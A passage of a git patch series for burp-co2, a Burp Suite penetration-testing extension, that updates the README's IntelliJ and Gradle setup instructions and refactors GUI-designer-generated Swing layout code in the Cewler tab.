capabilities including SQL Mapper, User Generator and Prettier JS. -EntryPoint: dist/co2-suite.jar -BuildCommand: gradlew fatJar +EntryPoint: build/libs/co2-all.jar +BuildCommand: gradle fatJar From 3d5a2f132a0f8b382a79f4c67d446112f62800b4 Mon Sep 17 00:00:00 2001 From: jgillam Date: Sat, 17 Feb 2024 16:02:13 -0500 Subject: [PATCH 6/8] updated generated gui designer classes --- .gitignore | 1 + README.md | 44 +- .../co2/cewler/CewlerTab.java | 77 ++-- .../co2/sqlmapper/SQLMapLauncherOptions.java | 50 ++- .../co2/sqlmapper/SQLMapperForm.java | 414 +++++++++--------- .../com/professionallyevil/co2/AboutTab.form | 2 +- .../com/professionallyevil/co2/AboutTab.java | 93 ++-- .../co2/IntruderPayloadForm.java | 32 +- .../co2/basicauth/BasicAuther.java | 45 +- .../co2/beautify/BeautifierConfigForm.java | 15 +- .../co2/masher/MasherConfig.java | 31 +- .../co2/masher/MasherTab.java | 107 ++--- .../co2/namemangler/NameManglerTab.java | 77 ++-- .../co2/usergenerator/UserGeneratorForm.java | 141 +++--- 14 files changed, 604 insertions(+), 525 deletions(-) diff --git a/.gitignore b/.gitignore index 3c4379b..83c9226 100644 --- a/.gitignore +++ b/.gitignore @@ -3,4 +3,5 @@ build/ modules/burp-api/burp/ .idea/ dist/ +modules/*/out/ diff --git a/README.md b/README.md index 1e9a02c..f762f32 100644 --- a/README.md +++ b/README.md @@ -19,22 +19,42 @@ See [ReleaseNotes](https://github.com/JGillam/burp-co2/blob/wiki/ReleaseNotes.md If you are interested in contributing or playing with the code, check out the setup instructions below: -## IntelliJ IDEA Setup Instructions: -This project is best built under IntelliJ IDEA. There are several modules -with dependencies on other modules. Here are some key modules: +## IntelliJ IDEA Setup Instructions -burp-api: The source is not populated by default! You must put the latest - API source from Burp into this source folder before building any - of the other modules. +This project is optimized for development in IntelliJ IDEA and involves multiple modules with interdependencies. To set up and build the project effectively, follow these guidelines: -co2-core: This module contains core functionality that is used across all - the CO2 modules. +### Key Modules: -co2-suite: This is the full CO2 suite module. It basically depends on everything - else. +1. **burp-api**: + - **Important**: This module requires the latest Burp API source code. + - Before building other modules, populate the `burp-api` module's source folder with the latest API source from Burp Suite. +2. **co2-core**: + - Contains core functionality used across all CO2 modules. -Output jar files from making these Burp extensions is organized under: +3. **co2-suite**: + - Represents the complete CO2 suite, depending on all other modules. - burp-co2/out/artifacts +4. **co2-cewler**: + - A standalone version of the CO2 Cewler module. + - +5. **co2-sqlmapper**: + - A standalone version of the CO2 SQLMapper module. + +### Gradle Build: + +- The project uses Gradle for building and managing dependencies. Ensure you have Gradle set up and configured properly. +- Run `./gradlew build` to build the entire project or individual modules. + +### IntelliJ IDEA GUI Designer: + +- The project uses IntelliJ IDEA's GUI Designer for some components. Ensure the GUI Designer is configured to generate Java source code. +- This setting is found under `File -> Settings -> Editor -> GUI Designer` in IntelliJ IDEA. Select `Generate GUI into: Java source code`. +- This configuration ensures that changes made via the GUI Designer are reflected in the Java source files, which are crucial for the Gradle build process. +- To rebuild the gui classes after changing forms, you can use the IntelliJ `Build -> Groovy Resources -> Build Resources` menu option. + +### Output Artifacts: + +- Output JAR files from the build process are typically located in the `dist` directory of each module. +- The Gradle `fatJar` task consolidates dependencies into a single JAR file for each module. \ No newline at end of file diff --git a/modules/co2-cewler/src/com/professionallyevil/co2/cewler/CewlerTab.java b/modules/co2-cewler/src/com/professionallyevil/co2/cewler/CewlerTab.java index 3dad083..1c13d61 100644 --- a/modules/co2-cewler/src/com/professionallyevil/co2/cewler/CewlerTab.java +++ b/modules/co2-cewler/src/com/professionallyevil/co2/cewler/CewlerTab.java @@ -20,12 +20,16 @@ import burp.IContextMenuFactory; import burp.IContextMenuInvocation; import burp.IHttpRequestResponse; +import com.intellij.uiDesigner.core.GridConstraints; +import com.intellij.uiDesigner.core.GridLayoutManager; +import com.intellij.uiDesigner.core.Spacer; import com.professionallyevil.co2.Co2Configurable; import com.professionallyevil.co2.Co2Extender; import com.professionallyevil.co2.Co2HelpLink; import com.professionallyevil.co2.StatusBar; import javax.swing.*; +import javax.swing.border.TitledBorder; import java.awt.*; import java.awt.datatransfer.Clipboard; import java.awt.datatransfer.ClipboardOwner; @@ -315,34 +319,34 @@ public Component getUiComponent() { */ private void $$$setupUI$$$() { mainPanel = new JPanel(); - mainPanel.setLayout(new com.intellij.uiDesigner.core.GridLayoutManager(5, 1, new Insets(5, 5, 5, 5), -1, -1)); + mainPanel.setLayout(new GridLayoutManager(5, 1, new Insets(5, 5, 5, 5), -1, -1)); final JPanel panel1 = new JPanel(); - panel1.setLayout(new com.intellij.uiDesigner.core.GridLayoutManager(2, 1, new Insets(0, 0, 0, 0), -1, -1)); - mainPanel.add(panel1, new com.intellij.uiDesigner.core.GridConstraints(3, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_BOTH, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, null, null, null, 0, false)); - panel1.setBorder(BorderFactory.createTitledBorder("Status:")); + panel1.setLayout(new GridLayoutManager(2, 1, new Insets(0, 0, 0, 0), -1, -1)); + mainPanel.add(panel1, new GridConstraints(3, 0, 1, 1, GridConstraints.ANCHOR_CENTER, GridConstraints.FILL_BOTH, GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_CAN_GROW, GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_CAN_GROW, null, null, null, 0, false)); + panel1.setBorder(BorderFactory.createTitledBorder(null, "Status:", TitledBorder.DEFAULT_JUSTIFICATION, TitledBorder.DEFAULT_POSITION, null, null)); progressBar = new JProgressBar(); - panel1.add(progressBar, new com.intellij.uiDesigner.core.GridConstraints(0, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_WANT_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); + panel1.add(progressBar, new GridConstraints(0, 0, 1, 1, GridConstraints.ANCHOR_CENTER, GridConstraints.FILL_HORIZONTAL, GridConstraints.SIZEPOLICY_WANT_GROW, GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); statusTextField = new JTextField(); statusTextField.setEditable(false); - panel1.add(statusTextField, new com.intellij.uiDesigner.core.GridConstraints(1, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_WANT_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, new Dimension(150, -1), null, 0, false)); + panel1.add(statusTextField, new GridConstraints(1, 0, 1, 1, GridConstraints.ANCHOR_WEST, GridConstraints.FILL_HORIZONTAL, GridConstraints.SIZEPOLICY_WANT_GROW, GridConstraints.SIZEPOLICY_FIXED, null, new Dimension(150, -1), null, 0, false)); final JSplitPane splitPane1 = new JSplitPane(); - mainPanel.add(splitPane1, new com.intellij.uiDesigner.core.GridConstraints(1, 0, 2, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_BOTH, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, null, new Dimension(200, 200), null, 0, false)); + mainPanel.add(splitPane1, new GridConstraints(1, 0, 2, 1, GridConstraints.ANCHOR_CENTER, GridConstraints.FILL_BOTH, GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_CAN_GROW, GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_CAN_GROW, null, new Dimension(200, 200), null, 0, false)); final JPanel panel2 = new JPanel(); - panel2.setLayout(new com.intellij.uiDesigner.core.GridLayoutManager(12, 2, new Insets(0, 0, 0, 0), -1, -1)); + panel2.setLayout(new GridLayoutManager(12, 2, new Insets(0, 0, 0, 0), -1, -1)); splitPane1.setLeftComponent(panel2); - panel2.setBorder(BorderFactory.createTitledBorder(BorderFactory.createLineBorder(Color.black), "Extract From")); + panel2.setBorder(BorderFactory.createTitledBorder(BorderFactory.createLineBorder(Color.black), "Extract From", TitledBorder.DEFAULT_JUSTIFICATION, TitledBorder.DEFAULT_POSITION, null, null)); final JScrollPane scrollPane1 = new JScrollPane(); - panel2.add(scrollPane1, new com.intellij.uiDesigner.core.GridConstraints(0, 0, 1, 2, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_BOTH, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_WANT_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_WANT_GROW, new Dimension(-1, 120), null, null, 0, false)); + panel2.add(scrollPane1, new GridConstraints(0, 0, 1, 2, GridConstraints.ANCHOR_CENTER, GridConstraints.FILL_BOTH, GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_WANT_GROW, GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_WANT_GROW, new Dimension(-1, 120), null, null, 0, false)); responseList = new JList(); responseList.setSelectionMode(2); scrollPane1.setViewportView(responseList); extractWordsButton = new JButton(); extractWordsButton.setText("Extract Words"); - panel2.add(extractWordsButton, new com.intellij.uiDesigner.core.GridConstraints(11, 1, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); + panel2.add(extractWordsButton, new GridConstraints(11, 1, 1, 1, GridConstraints.ANCHOR_CENTER, GridConstraints.FILL_HORIZONTAL, GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_CAN_GROW, GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); clearButton = new JButton(); clearButton.setText("Clear"); clearButton.setToolTipText("Clear this list and start over"); - panel2.add(clearButton, new com.intellij.uiDesigner.core.GridConstraints(11, 0, 1, 1, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_CENTER, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); + panel2.add(clearButton, new GridConstraints(11, 0, 1, 1, GridConstraints.ANCHOR_CENTER, GridConstraints.FILL_HORIZONTAL, GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_CAN_GROW, GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); minWordSizeSlider = new JSlider(); minWordSizeSlider.setMajorTickSpacing(1); minWordSizeSlider.setMaximum(5); @@ -351,19 +355,19 @@ public Component getUiComponent() { minWordSizeSlider.setPaintTicks(true); minWordSizeSlider.setSnapToTicks(true); minWordSizeSlider.setValue(3); - panel2.add(minWordSizeSlider, new com.intellij.uiDesigner.core.GridConstraints(2, 0, 1, 2, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_WANT_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); + panel2.add(minWordSizeSlider, new GridConstraints(2, 0, 1, 2, GridConstraints.ANCHOR_WEST, GridConstraints.FILL_HORIZONTAL, GridConstraints.SIZEPOLICY_WANT_GROW, GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); final JLabel label1 = new JLabel(); label1.setText("Minimum Word Size to Extract:"); - panel2.add(label1, new com.intellij.uiDesigner.core.GridConstraints(1, 0, 1, 2, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_NONE, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); + panel2.add(label1, new GridConstraints(1, 0, 1, 2, GridConstraints.ANCHOR_WEST, GridConstraints.FILL_NONE, GridConstraints.SIZEPOLICY_FIXED, GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); forceToLowercaseCheckBox = new JCheckBox(); forceToLowercaseCheckBox.setText("Force to Lowercase"); forceToLowercaseCheckBox.setToolTipText("Convert all words to lowercase."); - panel2.add(forceToLowercaseCheckBox, new com.intellij.uiDesigner.core.GridConstraints(5, 0, 1, 2, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_NONE, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); + panel2.add(forceToLowercaseCheckBox, new GridConstraints(5, 0, 1, 2, GridConstraints.ANCHOR_WEST, GridConstraints.FILL_NONE, GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_CAN_GROW, GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); ignoreCommonWordsCheckBox = new JCheckBox(); ignoreCommonWordsCheckBox.setSelected(true); ignoreCommonWordsCheckBox.setText("Ignore Common Words"); ignoreCommonWordsCheckBox.setToolTipText("Ignore words that are very common to the english language."); - panel2.add(ignoreCommonWordsCheckBox, new com.intellij.uiDesigner.core.GridConstraints(6, 0, 1, 2, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_NONE, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_SHRINK | com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_CAN_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); + panel2.add(ignoreCommonWordsCheckBox, new GridConstraints(6, 0, 1, 2, GridConstraints.ANCHOR_WEST, GridConstraints.FILL_NONE, GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_CAN_GROW, GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); maxWordSizeSlider = new JSlider(); maxWordSizeSlider.setMajorTickSpacing(1); maxWordSizeSlider.setMaximum(20); @@ -372,53 +376,53 @@ public Component getUiComponent() { maxWordSizeSlider.setPaintTicks(true); maxWordSizeSlider.setSnapToTicks(true); maxWordSizeSlider.setValue(20); - panel2.add(maxWordSizeSlider, new com.intellij.uiDesigner.core.GridConstraints(4, 0, 1, 2, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_HORIZONTAL, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_WANT_GROW, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); + panel2.add(maxWordSizeSlider, new GridConstraints(4, 0, 1, 2, GridConstraints.ANCHOR_WEST, GridConstraints.FILL_HORIZONTAL, GridConstraints.SIZEPOLICY_WANT_GROW, GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); final JLabel label2 = new JLabel(); label2.setText("Maximum Word Size to Extract:"); - panel2.add(label2, new com.intellij.uiDesigner.core.GridConstraints(3, 0, 1, 2, com.intellij.uiDesigner.core.GridConstraints.ANCHOR_WEST, com.intellij.uiDesigner.core.GridConstraints.FILL_NONE, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, com.intellij.uiDesigner.core.GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); + panel2.add(label2, new GridConstraints(3, 0, 1, 2, GridConstraints.ANCHOR_WEST, GridConstraints.FILL_NONE, GridConstraints.SIZEPOLICY_FIXED, GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false)); ignoreStyleTagContentsCheckBox = new JCheckBox(); ignoreStyleTagContentsCheckBox.setSelected(true); ignoreStyleTagContentsCheckBox.setText("Ignore